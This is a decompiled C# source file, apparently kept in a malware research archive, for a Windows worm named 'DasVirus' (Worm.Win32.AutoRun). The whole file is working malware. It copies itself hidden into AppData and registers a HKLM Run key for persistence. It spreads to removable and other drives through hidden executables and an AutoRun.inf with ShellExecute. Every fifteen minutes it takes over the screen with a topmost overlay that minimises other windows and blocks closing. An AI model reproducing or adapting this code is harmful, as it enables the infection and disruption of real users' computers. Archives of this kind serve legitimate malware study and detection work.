MalwareSourceCode/MSIL/Worm/Win32/A/Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7/Form1.cs
2022-08-18 06:28:56 -05:00

361 lines
12 KiB
C#

// Decompiled with JetBrains decompiler
// Type: DasVirus.Form1
// Assembly: DasVirus, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 47CE34B1-9892-4F0C-B487-F6525F961DF9
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.AutoRun.dfi-42e58a94d37b004c20933310233462c12ae3748211b12376559de6e22fc686c7.exe
using DasVirus.My;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace DasVirus
{
[DesignerGenerated]
public class Form1 : Form
{
private static List<WeakReference> __ENCList = new List<WeakReference>();
private IContainer components;
[AccessedThroughProperty("Timer1")]
private Timer _Timer1;
[AccessedThroughProperty("Timer2")]
private Timer _Timer2;
[AccessedThroughProperty("Timer3")]
private Timer _Timer3;
[AccessedThroughProperty("Timer4")]
private Timer _Timer4;
private Point lPoint;
private Point nPoint;
private Rectangle Scr;
private Graphics Graph;
private bool OpStatus;
private int PID;
private Pen MyPen;
[SpecialName]
private int \u0024STATIC\u0024Timer1_Tick\u002420211C1261\u0024Ticks;
[DebuggerNonUserCode]
static Form1()
{
}
[DebuggerNonUserCode]
public Form1()
{
this.FormClosing += new FormClosingEventHandler(this.Form1_FormClosing);
this.KeyDown += new KeyEventHandler(this.Form1_KeyDown);
this.Load += new EventHandler(this.Form1_Load);
lock (Form1.__ENCList)
Form1.__ENCList.Add(new WeakReference((object) this));
this.InitializeComponent();
}
[STAThread]
public static void Main() => Application.Run((Form) MyProject.Forms.Form1);
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (!disposing || this.components == null)
return;
this.components.Dispose();
}
finally
{
base.Dispose(disposing);
}
}
[DebuggerStepThrough]
private void InitializeComponent()
{
this.components = (IContainer) new System.ComponentModel.Container();
this.Timer1 = new Timer(this.components);
this.Timer2 = new Timer(this.components);
this.Timer3 = new Timer(this.components);
this.Timer4 = new Timer(this.components);
this.SuspendLayout();
this.Timer1.Interval = 50;
this.Timer2.Interval = 2000;
this.Timer3.Interval = 1000;
this.Timer4.Interval = 15000;
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(292, 273);
this.ControlBox = false;
this.DoubleBuffered = true;
this.FormBorderStyle = FormBorderStyle.FixedToolWindow;
this.Name = nameof (Form1);
this.Opacity = 0.0;
this.ShowInTaskbar = false;
this.Text = "DasVirus";
this.TopMost = true;
this.TransparencyKey = SystemColors.Control;
this.ResumeLayout(false);
}
internal virtual Timer Timer1
{
[DebuggerNonUserCode] get => this._Timer1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Timer1_Tick);
if (this._Timer1 != null)
this._Timer1.Tick -= eventHandler;
this._Timer1 = value;
if (this._Timer1 == null)
return;
this._Timer1.Tick += eventHandler;
}
}
internal virtual Timer Timer2
{
[DebuggerNonUserCode] get => this._Timer2;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Timer2_Tick);
if (this._Timer2 != null)
this._Timer2.Tick -= eventHandler;
this._Timer2 = value;
if (this._Timer2 == null)
return;
this._Timer2.Tick += eventHandler;
}
}
internal virtual Timer Timer3
{
[DebuggerNonUserCode] get => this._Timer3;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Timer3_Tick);
if (this._Timer3 != null)
this._Timer3.Tick -= eventHandler;
this._Timer3 = value;
if (this._Timer3 == null)
return;
this._Timer3.Tick += eventHandler;
}
}
internal virtual Timer Timer4
{
[DebuggerNonUserCode] get => this._Timer4;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Timer4_Tick);
if (this._Timer4 != null)
this._Timer4.Tick -= eventHandler;
this._Timer4 = value;
if (this._Timer4 == null)
return;
this._Timer4.Tick += eventHandler;
}
}
[DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern bool IsWindowVisible(IntPtr hWnd);
[DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern bool ShowWindow(IntPtr hWnd, Form1.nCS_Commands nCmdShow);
private void Form1_FormClosing(object sender, FormClosingEventArgs e)
{
if (!this.OpStatus)
return;
e.Cancel = true;
}
private void Form1_KeyDown(object sender, KeyEventArgs e)
{
e.SuppressKeyPress = true;
if ((e.Modifiers & Keys.Control) == 0 || e.KeyCode != Keys.C)
return;
this.OpStatus = false;
ProjectData.EndApp();
}
private void Form1_Load(object sender, EventArgs e)
{
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
if (Operators.CompareString(MyProject.Application.Info.DirectoryPath.ToLower(), folderPath.ToLower(), false) != 0)
{
Process.Start("explorer.exe", MyProject.Application.Info.DirectoryPath);
if (Process.GetProcessesByName("dasvirus").Length > 1)
ProjectData.EndApp();
this.CopyMeHidden(folderPath + "\\DasVirus.exe");
MyProject.Computer.Registry.LocalMachine.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true).SetValue("DasVirus Startup", (object) (folderPath + "\\DasVirus.exe"));
Process.Start(folderPath + "\\DasVirus.exe");
ProjectData.EndApp();
}
VBMath.Randomize();
this.Timer3.Start();
this.Timer4.Start();
}
public Point GenPoint()
{
Point point;
point.X = checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * (float) this.Scr.Width)));
point.Y = checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * (float) this.Scr.Height)));
return point;
}
private void Timer3_Tick(object sender, EventArgs e)
{
if (!(MyProject.Computer.Clock.LocalTime.Second == 0 & MyProject.Computer.Clock.LocalTime.Minute % 15 == 0))
return;
this.InitZlovred();
}
public void InitZlovred()
{
this.Opacity = 1.0;
this.Scr = Screen.PrimaryScreen.Bounds;
this.SetBounds(-3, -13, checked (this.Scr.Width + 6), checked (this.Scr.Height + 25));
this.Region = new Region(new Rectangle(3, 18, this.Scr.Width, this.Scr.Height));
this.lPoint = this.GenPoint();
this.Graph = this.CreateGraphics();
this.OpStatus = false;
this.PID = Process.GetCurrentProcess().Id;
this.MyPen = Pens.Black;
this.Timer1.Start();
this.Timer2.Start();
}
private void Timer1_Tick(object sender, EventArgs e)
{
checked { ++this.\u0024STATIC\u0024Timer1_Tick\u002420211C1261\u0024Ticks; }
if (this.\u0024STATIC\u0024Timer1_Tick\u002420211C1261\u0024Ticks > 100)
{
this.\u0024STATIC\u0024Timer1_Tick\u002420211C1261\u0024Ticks = 0;
this.MyPen = new Pen(Color.FromArgb(checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * (float) byte.MaxValue))), checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * (float) byte.MaxValue))), checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * (float) byte.MaxValue)))));
}
this.nPoint = this.GenPoint();
this.Graph.DrawLine(this.MyPen, this.lPoint, this.nPoint);
this.Graph.DrawString("DasVirus 1.0 beta 1 by HD", new Font("Verdana", 20f, FontStyle.Regular), Brushes.YellowGreen, 20f, 20f);
this.lPoint = this.nPoint;
Interaction.AppActivate(this.PID);
}
private void Timer2_Tick(object sender, EventArgs e)
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (processes[index].MainWindowHandle != this.Handle && Operators.CompareString(processes[index].ProcessName.ToLower(), "explorer", false) != 0 && Form1.IsWindowVisible(processes[index].MainWindowHandle))
Form1.ShowWindow(processes[index].MainWindowHandle, Form1.nCS_Commands.SW_MINIMIZE);
checked { ++index; }
}
}
private void Timer4_Tick(object sender, EventArgs e)
{
DriveInfo[] drives = DriveInfo.GetDrives();
int num = checked (drives.Length - 1);
int index = 0;
while (index <= num)
{
if (Strings.Asc(Strings.Left(drives[index].Name, 1)) > 66)
{
this.CopyMeHidden(drives[index].Name + "DasVirus.exe");
try
{
File.SetAttributes(drives[index].Name + "AutoRun.inf", FileAttributes.Normal);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
StreamWriter streamWriter = new StreamWriter(drives[index].Name + "AutoRun.inf", false);
streamWriter.Write("[AutoRun]\r\nShellExecute=DasVirus.exe");
streamWriter.Flush();
streamWriter.Close();
streamWriter.Dispose();
try
{
File.SetAttributes(drives[index].Name + "autorun.inf", FileAttributes.ReadOnly | FileAttributes.Hidden | FileAttributes.System);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
checked { ++index; }
}
}
public void CopyMeHidden(string DestPath)
{
try
{
File.SetAttributes(DestPath, FileAttributes.Normal);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
File.Copy(MyProject.Application.Info.DirectoryPath + "\\DasVirus.exe", DestPath, true);
try
{
File.SetAttributes(DestPath, FileAttributes.ReadOnly | FileAttributes.Hidden | FileAttributes.System);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public enum nCS_Commands
{
SW_HIDE = 0,
SW_NORMAL = 1,
SW_SHOWNORMAL = 1,
SW_SHOWMINIMIZED = 2,
SW_MAXIMIZE = 3,
SW_SHOWMAXIMIZED = 3,
SW_SHOWNOACTIVATE = 4,
SW_SHOW = 5,
SW_MINIMIZE = 6,
SW_SHOWMINNOACTIVE = 7,
SW_SHOWNA = 8,
SW_RESTORE = 9,
SW_MAX = 10, // 0x0000000A
SW_SHOWDEFAULT = 10, // 0x0000000A
}
}
}